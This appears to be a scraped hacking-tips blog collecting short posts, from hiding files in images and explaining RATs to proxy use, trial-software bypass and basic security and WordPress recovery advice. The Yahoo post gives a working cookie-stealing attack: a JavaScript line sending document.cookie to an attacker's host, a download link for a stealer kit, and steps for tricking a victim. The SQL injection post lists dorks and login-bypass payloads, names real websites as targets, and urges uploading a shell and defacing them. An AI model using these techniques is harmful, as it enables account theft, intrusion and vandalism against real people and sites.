Hide Files Behind The Images

Learn To Hide Files Behind The Images

There are some important  files or document you want to hide from others on your computer. To do that you might be creating folder inside folder to hide such files but in todays tutorial i will change this by teaching you a interesting trick to hide files behind images.To hide a file behind a image  means that if any one opens that image he will see the image, but to see the hidden file we need to open that image in a specific way. So lets get started.

How To Hide File Behind Image ?

In order to do this you should have basic understanding of command line, but if you don't know check out  tutorial given below.

• Video Tutorial On Basic Terminal Commands

1. Select an image to be used for hiding file behind the image.

2. Now select a file to hide behind the image and make it in .RAR format. With the help of the WinRAR.

3. And most important is that paste both the files on desktop. You may do this anywhere instead of desktop if you have some basic understanding of command line.

4. Now open cmd by going to Start > Accessories > Command Prompt and type following commands in it.

cd desktop

5. CD stands for change directory by typing above command you change your directory to desktop. After that type command given below.

 Copy /b imagename.jpg + filename.rar finalimage.jpg

• Replace imagename.jpg with the name of image you want your file to be hidden behind. Don't forget to add image format (Eg: .jpg,.png,.gif)
• Replace filename with name of your file you want to hide. It must be in .rar format.
• Finally Replace finalimage.jpg with whatever name you want your final image with hidden files should be. This is the image where your file will be hidden.

6. Now when you will try to open this newly created image it will open as normal image, but to open you hidden file you need follow steps given below.

How To Access Hidden File ?

To access your hidden file you need to open the newly created image in winrar. Just follow simple steps given below to do that.

    1. Open winrar

    2. Now locate your image and open it or simply drag your image in winrar.

    3. Extract the file and done.

Read More

Create A Undeletable And Unrenamable Folders In Windows

Create A Undeletable And Unrenamable Folders In Windows

In this tutorial you will learn cool and simple trick to Create an undeletable and unrenamable Folders In Windows operating system. Most of the Peoples are not aware that it is possible to create Undeletable, Unrenamable folder in windows without any software. To Test this concept just follow simple steps given below.

Try to make a new folder in windows & give it name con,aux, lpt1, lpt2, lpt3 up to lpt9. you won't be allowed to create folder with above mentioned names, Because they are reserved words in windows.

How To Create Undeletable And Unrenamable Folders ?

1. Go to Start and then Click on Run
2. Type cmd & hit enter (To open Command Prompt ).
3. Remember you cannot create Undeletable & unrenamable folder in your root directory (i.e. where the windows is installed) That means you can't make this kind of folder in C: drive if you installed windows on C:
4. Type D: or E: and hit enter
5. Type md con\ and hit enter (md - make directory)
6. You may use other words such as aux, lpt1, lpt2, lpt3 up to lpt9 instead of con in above step.
7. Open that directory, you will see the folder created of name con.
8. Try to delete that folder or rename that folder windows will show the error message.

How to delete that folder ?

It is not possible to delete that folder manually but you can delete this folder by another way mentioned below.

1. Open Command Prompt
2. Type D: ( if u created this type of folder in D: drive) & hit enter
3. Type rd con\ (rd - remove directory)
4. Open that directory and the folder will not appear because it is removed.

Read More

What Is RAT Or Remote Access Trojan ?

What Is RAT Or Remote Access Trojan ?

RAT stands for Remote Access Trojan or Remote Administration Tool. It is one of the most dangerous virus out their over the internet. Hacker can use RAT to get complete control to your computer. He can do basically anything with your computer. Using RAT hacker can install keylogger and other malicious viruses remotely to your computer, infect files on your system and more. In this post i will tell you about what hacker can do with your computer using RAT and tell you about some commonly use RAT by hackers.

 What is RAT ?

As i have told you in my introduction paragraph RAT is Remote Access trojan. It is a peace of software or program which hacker uses to get complete control of your computer. It can be send to you in form of images, videos or any other files. Their are some RAT that even your antivirus software can not detect.  So always be sure about what you are downloading from the internet and never save or download files that anonymous user send you  over the mail or in chat room.

 What You Can do With RAT ?

Once a RAT is installed on any computer hacker can do almost anything with that computer. Some malicious task that you can do with RAT are listed below:

• Infecting Files
• Installing Keyloggers
• Controlling Computer
• Remotely start webcam, sounds, movies etc
• Using your PC to attack Website (DDOS)
• View Screen

 Harmless RAT or Good RAT

As you have seen how harmfull RAT are for your computer, but their are some good RAT which some of you might be using daily. You might have heard of TeamViewer, it is a software which you use to control some one's computer with his permission for file transfer, sharing your screen and more.

 Some Commonly Used RAT

• ProRAT
• CyberGate RAT
• DarkComet RAT

Read More

How to Protect Hacking

Install or Update Your Antivirus Software: Antivirus software is designed to prevent malicious software programs from embedding on your computer. If it detects malicious code, like a virus or a worm, it works to disarm or remove it. Viruses can infect computers without users’ knowledge. Most types of antivirus software can be set up to update automatically.

Keep Your Firewall Turned On: A firewall helps protect your computer from hackers who might try to gain access to crash it, delete information, or even steal passwords or other sensitive information. Software firewalls are widely recommended for single computers. The software is prepackaged on some operating systems or can be purchased for individual computers. For multiple networked computers, hardware routers typically provide firewall protection.

Prevent hacking of your G-Mail Account: Some one mail you that we have a business opportunity for you. And say click on this link for more details. Whenever you click on that link, a gmail screen shown including message “Your session has expired login again”. Its a clone of gmail screen that can hack your password.

Install or Update Your Antispyware Technology: Spyware is just what it sounds like—software that is surreptitiously installed on your computer to let others peer into your activities on the computer. Some spyware collects information about you without your consent or produces unwanted pop-up ads on your web browser. Some operating systems offer free spyware protection, and inexpensive software is readily available for download on the Internet or at your local computer store. Be wary of ads on the Internet offering downloadable antispyware—in some cases these products may be fake and may actually contain spyware or other malicious code. It’s like buying groceries—shop where you trust.

Keep Your Operating System Up to Date: Computer operating systems are periodically updated to stay in tune with technology requirements and to fix security holes. Be sure to install the updates to ensure your computer has the latest protection.

Don’t Judge on Prize or Lottery E-mail: Someone mail you that you won the Lottery. And request you to give information regarding bank account or others. They keep your data’s and demanding the some money for Draft charges. It’s totally fraud.

Be Careful What You Download: Carelessly downloading e-mail attachments can circumvent even the most vigilant anti-virus software. Never open an e-mail attachment from someone you don’t know, and be wary of forwarded attachments from people you do know. They may have unwittingly advanced malicious code.

Turn Off Your Computer: With the growth of high-speed Internet connections, many opt to leave their computers on and ready for action. The downside is that being “always on” renders computers more susceptible. Beyond firewall protection, which is designed to fend off unwanted attacks, turning the computer off effectively severs an attacker’s connection—be it spyware or a botnet that employs your computer’s resources to reach out to other unwitting users.

Read More

Proxy and Anonymous Internet surfing

1) What is a proxy?
A proxy is an address of a proxy server (look @ kind of proxy's) that is placed between your computer and the internet :

Normal :
Computer --------> Internet
With proxy :
Computer ---------> Proxy server -----------> Internet

The main advantage of the Proxy is that it will cover up your IP address (your identity on net) which may help you in opening the ban sites in your country. It was very much popular in days when Facebook was banned in Pakistan and user use Proxies to log into their accounts.


2) Kind of Proxies:

You have 2 different proxy's (some more but these are for a normal internet users) :
-1: Private proxies : They are only for you (it's the same like buy your own ip address ) and will cost 15-20$
-2: Public Proxies : They are for everyone but the problem is sometimes you can get fast proxy's and sometimes slow ones. If you have a good site/list with fast proxy's there as good as private proxy's

3) Where get your proxy ?
There are many ways to find the proxies but some address are also expired , so just search Google for the Fresh Sites. (search : free Proxy, free anonymous surfing)

4) Use proxy with IE(Internet Explorer):
-1: Open Internet explorer
-2: Go to tools > Internet Options > Connections
-3: Now you will see “LAN Settings” open it
-4: Check Use a Proxy server for LAN. Than you will be able to use Address and Port.
-5: Get a proxy (Read Wear get your proxy's) and fill the address you don't have to fill it the port.
-6: Hit ok , ok and it's done. You surf now with a proxy !

5) How safe is it ?
The use of proxy's is legal and it's a good protection BUT don't think ur full protected/undetected. It's more and more popular and some (protected) site block public proxy's because of the spammers …

6) Proxy software
You have lots of software that work with proxies like a Anonymous Surfing, bruteforcer or proxy port scanner.I have even added an link to download 16 various anonymous IP tools from (http://rapidshare.com/files/242280367/IP_Anonymous_Surfing_Tool_16in1_.rar)


7) WARNING!!!!
It is true that a proxy hide your identity but don’t think that you are really safe if you hack CIA Database because in case of hack the Proxy site will give your real identity and you will end up in jail for at least 20 years. So be responsible!!! 

Read More

Hack Yahoo accounts with Session IDs or session cookies !

"Hack Yahoo accounts with Session IDs or session cookies".

What are session IDs or session cookies ?
Talking in simple language, whenever we sign into an account it generates a unique piece of string. One copy is saved on server and other in our browser as cookie. Both are matched every time we do anything in our account. This piece of string or login session is destroyed when we click on 'Sign Out' option.

Just login to yahoo.com. Type in browser javascript:alert(document.cookie);
You would get a pop up box showing you the cookies. Now login to your account and do same thing, you would see more elements added to the cookies. These represent sessions ids .

Note: By saying , stealing sessions or stealing cookies, I mean the same thing. Sessions are stored in our browser in form of cookies.

 An attacker can steal that session by convincing victim to run a piece of code in browser. Attacker can use that stolen session to login into victim's account without providing any username/password. This attack is very uncommon because when the victim  clicks 'Sign out' , session gets  destroyed and attacker too also gets signed out.

But in case of yahoo, its not the same.The attacker doesnt get signed out when victim clicks 'Sign out'. Though the session automatically gets destroyed after 24hrs  by yahoo. But when user simply refreshes the windows in yahoo account, he gets sessions for next 24 hrs. This means, once the  yahoo account session is stolen , attacker can access the account for life time by refreshing window in every 24hrs. I am not actually sure whether its 24 or 48 hrs.

Requirement: Download some files from here
http://www.ziddu.com/downloadlink/13712247/cookiestealer.rar

Tutorial to steal session IDs :-
1. Sign Up for an account at any free webhosting site. I have chosen my3gb.com.

2.  Login to your account and go to file manager. Upload the four files that you have just downloaded.
    Make a new directory 'cookies' here.

3. Give this  code to victim to run in his browser when he would be logged in to his yahoo account. Yahoo.php is basically cookie stealing script and hacked.php executes the stolen cookies in browser.
Stolen cookies get stored in directory 'cookies'
javascript:document.location='http://yourdomain.com/yahoo.php?ex='.concat(escape(document.cookie)); 
He would again redirected to his yahoo account.

4. Open the hacked.php . The password is 'explore'.

You must have got the username of victim's account. Simply Click on it and it would take you to inbox of victim's yahoo account without asking for any password.

Now it doesn't matter if victim signs out from his account, you would remain logged into it.

Note: You can try this attack by using two browsers. Sign into yahoo account in one browser and run the code. Then sign in through other browser using stolen session.

Read More

How to Hack Softwares to use them Lifetime

Hi, I am back today with a most usefull article..Hope all of you will Like It ! Here i will show you that "How to Hack Softwares to use them Forever ?" . That really a useful article,because in our daily life we need thousand of softwares today,which of most are highly paid..So how to use them Freely for whole Like ??

Most of us are familiar with many softwares that run only for a specified period of time in the trial mode.Once the trial period is expired these softwares stop functioning and demand for a purchase.But there is a way to run the softwares and make them function beyond the trial period. Isn’t this interesting?

Before I tell you how to hack the software and make it run in the trial mode forever, we have to understand the functioning of these softwares.I’ll try to explain this in brief.Because Purpose if ICA is 1st to clear your basics.So,When these softwares are installed for the first time, they make an entry into the Windows Registry with the details such as Installed Date and Time, installed path etc.After installation every time you run the software, it compares the current system date and time with the installed date and time.So, with this it can make out whether the trial period is expired or not.

So with this being the case, just manually changing the system date to an earlier date will not solve the problem.For this purpose there is a small Tool known as RunAsDate.

RunAsDate is a small utility that allows you to run a program in the date and time that you specify. This utility doesn’t change the current system date, but it only injects the date/time that you specify into the desired application.

Download RunAsDate v1.10

Intercepts the kernel API calls that returns the current date and time (GetSystemTime, GetLocalTime, GetSystemTimeAsFileTime), and replaces the current date/time with the date/time that you specify.It works with Windows 2000, XP, 2003 and Vista.

NOTE: FOLLOW THESE TIPS CAREFULLY
You have to follow these tips carefully to successfully hack a software and make it run in it’s trial mode forever.
1. Note down the date and time, when you install the software for the first time.
2. Once the trial period expires, you must always run the software using RunAsDate .
3. After the trial period is expired, do not run the software(program) directly.If you run the software directly even once, this hack may no longer work.
4. It is better and safe to inject the date of the last day in the trial period.

Read More

What is Encryption?

Encryption is a method or a technique used to encode a message so that it can’t be read by a normal user/person. Its an art of secret writing, It can also be defined as converting information from plain text using an algorithm or a cipher to make it unreadable, So that the converted information can only be read by the person who is having the special knowledge. The process of encoding is known as Encryption and its reverse process i.e. decoding it is known as Decryption. Encryption is very useful when it comes to protecting your confidential data from being stolen. It is helpful when data is transmitted over the network, it safe guards you data from sniffers. When data is needed to be encrypted over a network, SSL Protocol is used for encryption purpose. SSL stands for Secure Socket Layer.

Types of Encryptions


Symmetrical Key : This type of encryption is also know as Shared Key Secret. In symmetrical encryption, the key which is used in the process of encryption, that same key is also used in the process of decryption. If two parties want to exchange the encrypted data securely, both of them should have the same copy of symmetric key.

Asymmetrical Key : This type of encryption is also know as Public Key. In this type of encryption, keys are generated in pairs, public key and private key. In asymmetrical encryption key used to encipher is different from the key used to decipher. Therefore the two partners have two different keys, one is made public and other one is made private. Let’s take up an example to understand the concept in an easy way.

Suppose, John wants to send a message to Mike, he just ciphers the message with the public key and sends it to Mike. Since Mike is having the secret key, he can and decipher the message and read its content.

Read More

Basic SQL injection for website hacking

Demo Of Basic SQL injection for website hacking

You might have seen hackers hacking and defaceing websites, editing it with their own stuff, makeing post on websites etc. There are many methods of doing this, In this tutorial I will be showing you a very basic and simply SQLi (Structured Query Language Injection).  I will show you how to find the websites admin panel using a simple google dork and a SQL query to bypass the admin user name and password and enter into the panel. When you are in the panel just find a upload option and upload your shell, then deface it.


Dorks: inurl:adminlogin.aspx
            inurl:admin/index.php
            inurl:administrator.php
            inurl:administrator.asp
            inurl:login.asp
            inurl:login.aspx
            inurl:login.php
            inurl:admin/index.php
            inurl:adminlogin.aspx


# Try to make your own dorks also to get more success rate.


Hundreds of sites will open up having /adminlogin.aspx in their URL. Select any website, you will get the area from where the admins login. Fill the details as:
User: 1'or'1'='1
Password: 1'or'1'='1


Use the above mentioned login details and you will be into the admin panel of a website. I will not work for all the websites you will find, but will work on most of the website. 


Some websites which I got:
http://gimtech.in/Webadmin/AdminLogin.aspx
http://welkinindiagroup.com/admin/adminlogin.aspx
http://nobinsolutions.com/Adminlogin.aspx





Other InjecTion Queries:
‘ or 1=1 –
1'or’1'=’1
admin’–
” or 0=0 –
or 0=0 –
‘ or 0=0 #
” or 0=0 #
or 0=0 #
‘ or ‘x’='x
” or “x”=”x
‘) or (‘x’='x
‘ or 1=1–
” or 1=1–
or 1=1–
‘ or a=a–
” or “a”=”a
‘) or (‘a’='a
“) or (“a”=”a
hi” or “a”=”a
hi” or 1=1 –
hi’ or 1=1 –
hi’ or ‘a’='a
hi’) or (‘a’='a
hi”) or (“a”=”)

Read More

How to make you computer fresh and fast

In this Article We will explain some simple methods to make your computer cleaner and run faster for long period of time. It’s so frustrating to see our computer slowed down after a period of time. So in this article you will get some methods or you can say ways to make your computer run faster.
Follow the methods listed below:-

Remove Useless software and apps : We often install many unnecessary application and later forget to uninstall them These application becomes burden in our computer and eventually slow down our computers So at first you need to delete all this unnecessary application and software To uninstall the software you should go to Control Panel->Add or remove->find and select the software you would like to uninstall.
Utilize your RAM performance : A lot of you may have these setting already set. But If you don’t have then don’t worry. You just have to follow the process. Right click on My computer->Properties->Advanced system settings->Setting(Under Performance)->Advanced->Change(Under Virtual Memory). Now double the number in Maximum size then the number initial size. It will surely help your PC to utilize the most of RAM.
Check for errors : Our computers face errors very oftenly in daily use and some errors stuck to our computer hard disk which makes our computer slow. So its very important to kill those errors to make our computer work better. Go to My computer and press enter .Our main hard disk is usually C: and we need this drive to be free from error So right click on Hard disk C and then click tools Then from the Error-Checking option click You may need to restart the computer to do so It will make your computer Faster.
Desktop-cleaning : We often keep unnecessary file in our desktop but it actually affects the performance of our computer. Delete the useless files or another choice is to move them to Local disk if necessary. You should only keep shortcuts in your Desktop only if you needed. If we keep Wallpapers on our desktop it also effect slightly to slow down our computer a blank screen is always better remove temporary internet files and cache from your web browser Browsing internet slow down our computer You need to clean these temporary files and cookies to make your computer stay clean and faster. There are a no. of software available today in the market which can do the task for you. You can use Ccleaner for this purpose which is a very trusted software. To proceed to the official website to download Click here
Disk Defragmentation : We should defragment our disk to make our PC faster. For deframentation process, just follow the same steps given below. Locate Hard disk C then click properties then click tools and then click defragment Now from the option Disk defragmentation.
Use a Trusted antivirus : he last but not the least tip is to use a reliable trusted antivirus which will protect your PC from harmful antivirus. Kaspersky and AVG are some of the trusted antivirus but you have to pay to use them. If you don’t wish to pay some money then you can also download free Microsoft security essential to save your computer from harmful Malware and spywares. Check the link here

Read More

Security tips to Aviod Virus /Trojan/ Keylogger Infection

Security tips to Aviod Virus /Trojan/ Keylogger Infection

1. Install a good antivirus. Free or Paid is good, but dont used cracked or pirated versions.

2. Install real-time anti-spyware protection

3. Update your Anti-virus programs daily.

4. Perform scans on your computer daily.

5. Disable autorun to prevent infection from pendrives.

6. Disable image previews if usiing Outlook

7. Use good anti-virus which has browser plugins and scans all URL's for malacious content.

8. Use Hardware based Firewall.

9. Dont click on any mail links or attachments from unknown sources or malacious users.

10. Never download softwares from third-party sites. Download from original website. Dont use cracks or keygens which may be a virus/trojan itself.

Read More

System Security For User........

System Security For User........

1. Always use a strong password with a combination of alphabets, numbers and special characters

2. Use Original Antivirus. Dont download Cracks & Keygens which are the main entry point for Viruses and Trojans.

3. Use Original Windows OS ( Paid ) or Use Open source OS such as Linux, Ubuntu, Flavours of Linux. Do not use some programs to patch your system.

4. Regularly Update your Antivirus and OS to remove and/or patch vulnerabilities and keep your system secure.

5. Shutdown / Uninstall unwanted programs or programs which you dont use such as FTP, Telnet or any softwares which use your resource.

6. Use Drive Encryption tools to protect your data from data theft and to protect from data loss.

7. Always create a back-up of your important files to a Hard disk or Online Servers ( like Drop box )

8. Never trust any other network to which you connect( OPen WiFi ). Crackers & hackers can compromise your data and also steal your data transmitted .

9. Have a routine check of your computer for defects and patch immediately.

10. Never leave your computer unattended, even for a short time. It is easy for a cracker to inject a virus or spyware into your system.

Read More

Secure Browsing Tips

Secure Browsing Tips

1. Never keep same password for different services you use online like gmail , facebook, bank accounts etc.,

2. Use multiple accounts so that you dont get spams in your personal/ official email address.

3. Install good Antivirus and Two way firewall.

4. Use VPN for hiding identity and secure browsing when using internet out of your home.

5. Update your OS, Antivirus, Firewall and Browsers regularly.

6. Install a good spyware & Adware scanner .

7. Never provide personal information openly in public websites. Share your information carefully.

8. Never click on unwanted or suspiicious links. It may be hacking attempt.

9. Change your passwords regularly to increase the security of your daily actiivities.

Read More

Email Security Tips For Internet Users

Email Security Tips For Internet Users......

1. Enable two step verification in you Email accounts.
2. Enable Login-notification for you email and get notification in your mobile whenever you login.
3. Set a strong password with a mix of alphabets, numbers and special charecters.
4. Enable login- notification for you facebook accounts to prevent unauthorised access.
5. Enable HTTPS in your email sttings annd your facebook account settings.
6. Never share your password with anyone. Even to your closest person.
7. Setup a recovery question which is difficult to answer and never setup an easy & guessable answer to your security question.
8. Never click on any links sent through mail or chat. It may be a link which can steal your cookie or inject any viruses.
9. Always check your address bar for proper website address before logging in.

Read More

How to Hide your IP Address | Change IP Address

After a lot of requests from various hackers across the world, we are coming up with this post on . This post will tell you How to Hide Your IP Address or How to Change your IP Address

Changing or Hiding the IP address is one of the biggest concerns of all Hackers as the IP Address can reveal the identity if the Hacker. Its just like your online address. If anyone can find your actual online address (IP Address), tracing you back won’t be that difficult.
Thus it is very important to hide or change your IP address before doing any kind of hacking attack or even think of doing so.
After getting hundreds of request on a tutorial on how to hide your IP address, here I am writing a detailed step by step tutorial on how to hide or change ip address.
We are using the proxy service called Hide my Ass (pro VPN).
What’s that? Let me explain in detail.
We all know about proxy servers. They help us to hide your ip address or change ip address but there are many things you guys don’t know.
1) Free proxies are not completely anonymous – Your up can be disclosed by the website owner to the concerned authorities if needed.
2) Companies limit the maximum speed of browsing in free proxies – Say your internet speed is 8 Mbps, still using free proxies you can browse internet with a speed of only 265 kbps. This is irritating, isn’t it.
3) Many Webmasters can block users accessing free proxies.
There are different type of proxies. Read Types of Proxy | How to Hide IP Address for more.
Even I wanted a reliable and Elite Proxy which can help me completely hide my Online Identity and what else could be better than changing my IP address every minute. I looked for many solutions online and then I found the PRO VPN of Hide My Ass.

To be very honest, in the beginning I was a bit confused when I saw the software. I was not very sure if it would work the way I wanted to but then I gave it a try. I thought of jiving it a try just for 1 month. It was just for $11.52 then , not it costs $9.99 only. I could actually think of spending $11.52 for my only if it gave me the kind on anonymity I wanted on internet. It helped me secure my online Identity online.
Here are benefits I got after using the PRO VPN of Hide My Ass.

1. Super fast, high speed elite / anonymous proxies. Elite proxies are 100 times more secure than free proxies
2. I could select the country whose IP address I wanted in just 1 click. It offers over 38000+ unique IP Address from 53 different countries.
3. I can set the timer to automatically change the IP Address. This way my IP Address gets changed every minute without me bothering to do so. If I am implementing a hacking attack, no-one could actually find my actual IP Address so I am always on the safer side.
4. It anonymously encrypts all the traffic and works with all kind of platforms. Unlike free proxies the PRO VPN of Hide My Ass is not blocked by the websites. The traffic seems to be of legitimate human users, not proxies so on one can catch you using them.

Read More

Make WhatsApp Free For Lifetime only for Android

Make WhatsApp Free For Lifetime only for Android !

1: Uninstall whatsapp,if your trial version is finished, or you want
to extend it for a year.

2: Go to gmail application and
create a new gmail id.

3: Once you have made it,wait for some time (it totally depends on
your connection speed,ideally you
should wait for 15-20 minutes)

4: Go to google play, click on the menu button of your android and choose "Account Settings".

5: Once you have done this,you just need to choose the new gmail
account, you just created, and download whatsapp once again.

6: Now open whatsapp, and sign into your whatsapp account...

Step 7-Enjoy!!

Note:- This way you will make it free for one year,to make it free for
lifetime, you will have to apply this trick once every year.

Read More

What is HTTP Header Injection Vulnerability

HTTP Header

HTTP Header is the component of HTTP requests and responces. Header fields are transimitted with each request and responce and carry additional data about the requests and responces.

See the typical request and responce headers Here at Web-Sniffer.net

HTTP header injection

HTTP header injection is a kind of web application vulnerability which exists on those web applications that generatd HTTP headers based on the input given by users. If it uses User based input in the headers, it can be used for HTTP response splitting, cross-site scripting (XSS), Session fixation via the Set-Cookie header, and malicious redirects attacks via the location header.

I recently found a similar kind of vulnerability in http://canadaedu.apple.com and for this I was also acknowledged by Apple on its website.

It used apache 1.3.33 that was vulnerable to the HTML and malicious javascript injection through  "Expect" header.

See the responce header of the website:

GET / HTTP/1.0
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)
Host: canadaedu.apple.com
Cookie: PHPSESSID=3b8026225d719c6945155129c5c7335d
Connection: Close
Expect: <script>alert(411731119275)</script>
Pragma: no-cache

The alert box added in the Expect field could be injected for Cross Site Scripting.

Read More

How To Recover Your Hacked WordPress Website In Easy Steps?

WordPress is one of the most popular content management systems at present. However as a general law, the increasing popularity comes with a number of dangerous has gained attention of bad boys as well. There are so many people who are reporting the cases of hacked WordPress account on a regular basis. So I have thought of putting a complete guide to discuss how to recover your hacked WordPress.

Ways To Recover Hacked Account

Below is the perfect path to follow to get your hacked account back:

Backup – Even if your website is infected to a small extent, it is still very much necessary to secure the backup for your website before waiting for watching the things turning into worst. Don’t forget to take backup of your entire database and all files. You can also try for a faster solution by using BackupBuddy.

Change Login Details and Secret Access Keys – At the time you sense the hacking attempt, just try to login to your account to check whether your login details are still effective or not. If the username and password details are not yet changed then immediately change all the WordPress secret access keys in wp-config.php file and of-course your username and password.

Running Scanners – Running a scanner is also a very helpful step and comes at number 3 in this list. The scanners are basically used for identifying the compromises at the level of database. You can try out Cloud Sites WP Scanner plug-in or Sucuri Malware Scanner. After running the scanner you should make sure to move the next step stated below.

Installing Your WordPress Again – Next important step involves Deleting all the files existing in the directory of WordPress except wp-config.php file and wp-content directory. After that you need to download and install a totally fresh copy of WordPress. Now edit the wp-config-sample.php file by substituting the sample values by picking the actual database values from the wp-config.php file that you haven’t deleted as stated above. Now you can delete the present file and replace it with your own file.

Review Content Folder – Next task involved to check all the folders to find ones with any suspicious activity in your wp-content directory. So carefully analyze the folders content and remove any one that seems not to be belonging to you. If you later find that the folder was actually needed then you can get it back from your backup.

Analyze and Re-install Your Plug-ins – The next steps after completing with reviewing the folders’ content includes reviewing the plug-ins. Collect information about what plug-ins you are not using currently and uninstall them all for the time being. Now coming to all other activated plug-ins that you are using currently, deactivate and delete these plug-ins and then re-install and activate the active plug-ins.

Analyze Your Themes – Now the next thing that should be taken care of is the task of removing the extra themes which are not in use currently. Next task again involves reviewing your activated theme. Look through the PHP or Javascript code to find out any suspicious activity there. Most of the time hackers make such malicious changes in header.php or footer.php files.

Following this step by step guide can really help you a lot in getting your WordPress back. Also always remember to keep checking for the activities on your WordPress site. Also make it a habit to keep a time by time backup of your database. For more recovery details you can check onhttp://codex.wordpress.org/FAQ_My_site_was_hacked.

How to Secure before Getting hacked !

Every one is looking to make their blog looks secure and try to make their blog safe from hackers so that hackers can not take any kind of information from your blog. You can protect and increase security of your by doing following things :-

Chap Secure plugin

You can increase the security of your log-in by using Chap secure plugin, It helps in encrypting passwords by using CHAP protocol. It will help hacker to get in trouble.

Login Lockdown Plugin

This plugin helps a lot in stopping a hacker because if he is trying to play with your login screen then this plugin will limit hit after few wrong attempts.Just download the plugin and activate it. This plugin helps to secure your blog from newbie hackers. 

WP Security Scan

This plugin helps to check all the codes of your website from hacking Malware and scripts. It can find out which code or which file has virus in the blog.

Updating WordPress regularly

Try to upgrade the WordPress regularly as soon as any new version is launched. Most of the bloggers do not update WordPress and chances are huge that old WordPress version can get hacked.

Tac Theme Checker

You can install a plugin “Tac Theme checker” which can check your theme before activating it. It helps you to check the complete theme when you upload it into Dashboard and it helps to check the files completely in few seconds.

Make your security Bullet proof

You should increase your security more and more by adding some official steps from WordPress website and you can read them here http://codex.wordpress.org/Hardening_WordPress.

Theme of your Blog

Your theme plays an important part in hacking, If you are using some cracked version of theme then be ready to get hacked soon. Cracked themes often have codes which helps to get you hacked. I would suggest that get a proper theme from any web design company so that there is no chance to get hacked due to unethical themes.

Read More